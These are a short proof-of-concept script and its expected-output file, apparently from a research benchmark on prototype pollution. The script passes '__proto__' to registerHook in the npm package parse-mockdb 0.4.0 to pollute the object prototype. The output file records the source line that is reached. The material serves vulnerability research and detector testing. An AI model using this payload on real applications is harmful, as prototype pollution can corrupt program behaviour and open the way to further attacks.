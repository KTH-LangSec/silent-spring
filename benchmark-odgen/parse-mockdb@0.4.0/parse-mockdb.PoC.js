// comment out the following lines in parse-mockdb@0.4.0\parse-mockdb@0.4.0\src\parse-mockdb.js: to run the PoC
// const _ = require('lodash');
// const crypto = require('./crypto');


const ParseMockDB = require('./parse-mockdb@0.4.0')
ParseMockDB.registerHook('__proto__', 'polluted', 'yes')