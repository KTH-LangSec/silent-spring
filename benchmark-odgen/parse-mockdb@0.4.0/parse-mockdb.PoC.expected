parse-mockdb@0.4.0/src/parse-mockdb.js:210:3